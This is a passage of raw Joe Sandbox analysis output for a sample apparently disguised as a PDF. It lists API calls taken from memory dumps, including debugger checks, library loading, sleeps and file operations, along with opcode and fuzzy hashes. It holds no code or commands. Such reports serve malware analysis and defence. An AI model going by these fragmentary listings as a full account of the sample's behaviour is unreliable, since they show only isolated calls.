                                                    • Opcode Fuzzy Hash: d7a5dc2195a5021168156bb59c3be48acf63d4a72a61fd59e19fbe2db0d92270
                                                    • Instruction Fuzzy Hash: 064122B2500B019FD7369F28D851A7A77E5AF89330B14C71DE4AA8F6D9DB74D8008B51
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00343A73
                                                      • Part of subcall function 00361405: __lock.LIBCMT ref: 0036140B
                                                      • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00343AF3
                                                      • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343B08
                                                      • Part of subcall function 00343D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                                      • Part of subcall function 00343D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                                      • Part of subcall function 00343D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                                      • Part of subcall function 00343D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343AB3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 924797094-0
                                                    • Opcode ID: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                                    • Instruction ID: 3cacd87a92678e114a1689020a20fe00814a8209c427fb203c6243a7554d3544
                                                    • Opcode Fuzzy Hash: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                                    • Instruction Fuzzy Hash: 40119D719043419BC302EF29E94591EFBE9EB95710F00892EF9859B2B2DB709544CB96
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 0036EA29
                                                    • __close_nolock.LIBCMT ref: 0036EA42
                                                      • Part of subcall function 00367BDA: __getptd_noexit.LIBCMT ref: 00367BDA
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                    • String ID:
                                                    • API String ID: 1046115767-0
                                                    • Opcode ID: c344fcedbc3e1f7b430525d7c184057fa64c3bc58114e8facb38053def5c010c
                                                    • Instruction ID: c28e27f5c0f9043f26dc92b558aea2456aa4a279710f905c8a488e7173967d50
                                                    • Opcode Fuzzy Hash: c344fcedbc3e1f7b430525d7c184057fa64c3bc58114e8facb38053def5c010c
                                                    • Instruction Fuzzy Hash: 2C11E576805A108AD713BFE8C9463587AA16F81335F26C340E4201F1EECBB48C049AA5
                                                    APIs
                                                      • Part of subcall function 0036395C: __FF_MSGBANNER.LIBCMT ref: 00363973
                                                      • Part of subcall function 0036395C: __NMSG_WRITE.LIBCMT ref: 0036397A
                                                      • Part of subcall function 0036395C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                                    • std::exception::exception.LIBCMT ref: 0035F51E
                                                    • __CxxThrowException@8.LIBCMT ref: 0035F533
                                                      • Part of subcall function 00366805: RaiseException.KERNEL32(?,?,0000000E,003F6A30,?,?,?,0035F538,0000000E,003F6A30,?,00000001), ref: 00366856
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: 9bbae03c983f0c92ff5534f06f720a56abf1fee764d210483bd5eca82f011835
                                                    • Instruction ID: c36a826865f05fea3d899139d5d6cc9da58661fdf3523c9d19a084ab442b92d0
                                                    • Opcode Fuzzy Hash: 9bbae03c983f0c92ff5534f06f720a56abf1fee764d210483bd5eca82f011835
                                                    • Instruction Fuzzy Hash: 28F0A47510421D6BDB07BFA9D802EEE77AC9F01354F608439FD08D6195DBB09A4487A5
                                                    APIs
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __lock_file.LIBCMT ref: 00363629
                                                      • Part of subcall function 00364E1C: __lock.LIBCMT ref: 00364E3F
                                                    • __fclose_nolock.LIBCMT ref: 00363634
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 73889bfa3f2e671437f65e111bf826854c13d412aee277e9c4d7614c435a5553
                                                    • Instruction ID: da44c16ee1e4fe928d92706aef1731eaa193a25bf0f0e2bacf4b6a2fd419075c
                                                    • Opcode Fuzzy Hash: 73889bfa3f2e671437f65e111bf826854c13d412aee277e9c4d7614c435a5553
                                                    • Instruction Fuzzy Hash: A6F0B471901604AAD7137B69C84776EBEA06F41334F25C118E461AF2D9CB7C8A019B95
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePeek
                                                    • String ID:
                                                    • API String ID: 2222842502-0
                                                    • Opcode ID: cdce7180fd40ea6937412335c320411597b44bd2a8d5313d6f94c77f30add447
                                                    • Instruction ID: 0178c015eeaf32ded03a2a5228050493e8edb286f60231dc63d03f7c0b3ae78d
                                                    • Opcode Fuzzy Hash: cdce7180fd40ea6937412335c320411597b44bd2a8d5313d6f94c77f30add447
                                                    • Instruction Fuzzy Hash: 0D71E7709043808FEB27CF24C8897AA7BD0FB55308F09497DE9859F6A1D775E885CB92
                                                    APIs
                                                      • Part of subcall function 00CEBA48: GetFileAttributesW.KERNELBASE(?), ref: 00CEBA53
                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00CEC310
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AttributesCreateDirectoryFile
                                                    • String ID:
                                                    • API String ID: 3401506121-0
                                                    • Opcode ID: d31d35e2132d629ed9f19716ec7e5ebd7474eff526ac90dd34e39f4d6a7948f6
                                                    • Instruction ID: 884b46b076b82ea1e0e487700ab99b6ddaed17ae2efc0e0c1526fe7c6752b2dc
                                                    • Opcode Fuzzy Hash: d31d35e2132d629ed9f19716ec7e5ebd7474eff526ac90dd34e39f4d6a7948f6
                                                    • Instruction Fuzzy Hash: 17518331A1024896DF14EFA1D845BEF7339EF58300F004669F509EB290EB799B45CBA5
                                                    APIs
                                                    • __flush.LIBCMT ref: 00362A0B
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __flush__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 4101623367-0
                                                    • Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                                    • Instruction ID: af8ee3637cc7293ce19d088df9969f1a6367aa57e89bfba571075f612b46cbd6
                                                    • Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                                    • Instruction Fuzzy Hash: B241C930700F069FDB2A8EA5C88156F77B6AF84350B16C53DE855CB148DBB4DD508B40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 1b33f636a489534e9f272f4cd10c3eb9792c70344f2f4ff0065624850fdaaf2c
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: A4310470A00105DFC71ADF18C490A69FBF6FF49341B6586A5E819CB666DB30EEC5CB80
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 21383b5c285938fe9fc49432c9b28ce152f4afab072d88e2f57a9966c2c213f9
                                                    • Instruction ID: e192702c67735783678cbbf17ae024b91eddb37d103197d99871131619888f2a
                                                    • Opcode Fuzzy Hash: 21383b5c285938fe9fc49432c9b28ce152f4afab072d88e2f57a9966c2c213f9
                                                    • Instruction Fuzzy Hash: 57413A705046518FDB26CF14C484F1ABBE0AF45308F1989ACE99A4B762D772E849CF52
                                                    APIs
                                                      • Part of subcall function 00344214: FreeLibrary.KERNEL32(00000000,?), ref: 00344247
                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003439FE,?,00000001), ref: 003441DB
                                                      • Part of subcall function 00344291: FreeLibrary.KERNEL32(00000000), ref: 003442C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load
                                                    • String ID:
                                                    • API String ID: 2391024519-0
                                                    • Opcode ID: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                                    • Instruction ID: 4a53259bae3e94d5973cc2a1933e9ec285647a9e29df0ce6119266d1f56be60a
                                                    • Opcode Fuzzy Hash: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                                    • Instruction Fuzzy Hash: C3119131600306AADB12AF64DC06FAEB7E99F40704F108839B596AE1C1DAB0EA019B60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 40e1542ec9ac71c491e281ebcb3d8b2d8a24baf0a8a987620567442e8783f38c
                                                    • Instruction ID: e8e46a508d30d28be1e8a3a0f213303849dbf69df362916e65095733b2bdddaf
                                                    • Opcode Fuzzy Hash: 40e1542ec9ac71c491e281ebcb3d8b2d8a24baf0a8a987620567442e8783f38c
                                                    • Instruction Fuzzy Hash: 482105705086018FDB2ADF68C444F2ABBF1BF85305F154968EA9A4B672D732F849CF52
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 0036AFC0
                                                      • Part of subcall function 00367BDA: __getptd_noexit.LIBCMT ref: 00367BDA
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                    • String ID:
                                                    • API String ID: 1144279405-0
                                                    • Opcode ID: 819b4496d5a6454135948c5bb95c66218ac1ee972e7ae0cdb2f9511cd48109d0
                                                    • Instruction ID: dd3fadee3935ac98c22e0420646e074fe38c056827c60aa0b9c8ddde722e6ed6
                                                    • Opcode Fuzzy Hash: 819b4496d5a6454135948c5bb95c66218ac1ee972e7ae0cdb2f9511cd48109d0
                                                    • Instruction Fuzzy Hash: 121191728056109FD7137FA4C942769BFA0AF41335F66C250E474AF1EAC7B58D408FA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                    • Instruction ID: 20ce384f151982473dbf4d9feae63715522b0e1046d402b306f6dd2704a76695
                                                    • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                    • Instruction Fuzzy Hash: B901493150010DAFCF06EFA4C8918FFBBB8EF11344F148165B5559B195EA30AB49DF60
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00362AED
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 09767d84a2a888d9e98cfddb7bec619f5cd22781cbf6c40a91e1467b5a695ce9
                                                    • Instruction ID: 2575136b3ef367b7d60d2e9dbcb03d402a288ade7d4aa14904e9f1bd02852809
                                                    • Opcode Fuzzy Hash: 09767d84a2a888d9e98cfddb7bec619f5cd22781cbf6c40a91e1467b5a695ce9
                                                    • Instruction Fuzzy Hash: 09F0C231900605AADF23AFA5CC0239F7AA5BF00310F16C415F4109F199CBB98A22EB81
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,003439FE,?,00000001), ref: 00344286
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                                    • Instruction ID: ec1b4338cb55a84b8ac311628bfcc447754d681fa04ed7c35a3a13358e10eea5
                                                    • Opcode Fuzzy Hash: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                                    • Instruction Fuzzy Hash: 47F01571505702CFCB369F64D890916BBF8AF043253258E3EF1D68AA20C7B2A940DB50
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath
                                                    • String ID:
                                                    • API String ID: 82841172-0
                                                    • Opcode ID: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                                    • Instruction ID: e72b43b52f49486ea24cd74f53a5807249b9cea5c9b846ecdcf35404df50c3f4
                                                    • Opcode Fuzzy Hash: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                                    • Instruction Fuzzy Hash: 55E072326002241BC712A658CC42FEA73ACDF887A0F0900B0F908EB208DAA0A9818690
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CEBA53
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction ID: c1da1ab808278fb7a01c6fd4d8a955d12d3d500a19e24a1d6af3952e4a078441
                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction Fuzzy Hash: 0CE08C30909348EBCF10CAAA8904ABA73A8AB06360F104768A826C32A0DA308F00F650
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CEBA23
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction ID: 790591dd9c6ed83a9dac79cccb5e681f8e1c13b0df0e4729d976c3d21623326e
                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction Fuzzy Hash: EFD0A73090520CEBCF10CFB59D04AEE73A8DB05320F104764FD15C3280D6719E00A750
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 00CED419
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction ID: 28775a315239dca51ec5b019cda306941c23620964ce873848f4086fe3734f7f
                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction Fuzzy Hash: 10E0BF7494110DEFDB00DFA8D5496DD7BB4EF14301F1045A1FD05D7680DB309E548A62
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 00CED419
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: f0275f2c672c311522ae0fd83bc625c17acbd1a1fae67aecc441970ccce3b0cd
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 3DE0E67494110DDFDB00DFB8D5496DD7BB4EF14301F104561FD05D2280D6309D508A62
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 003AF87D
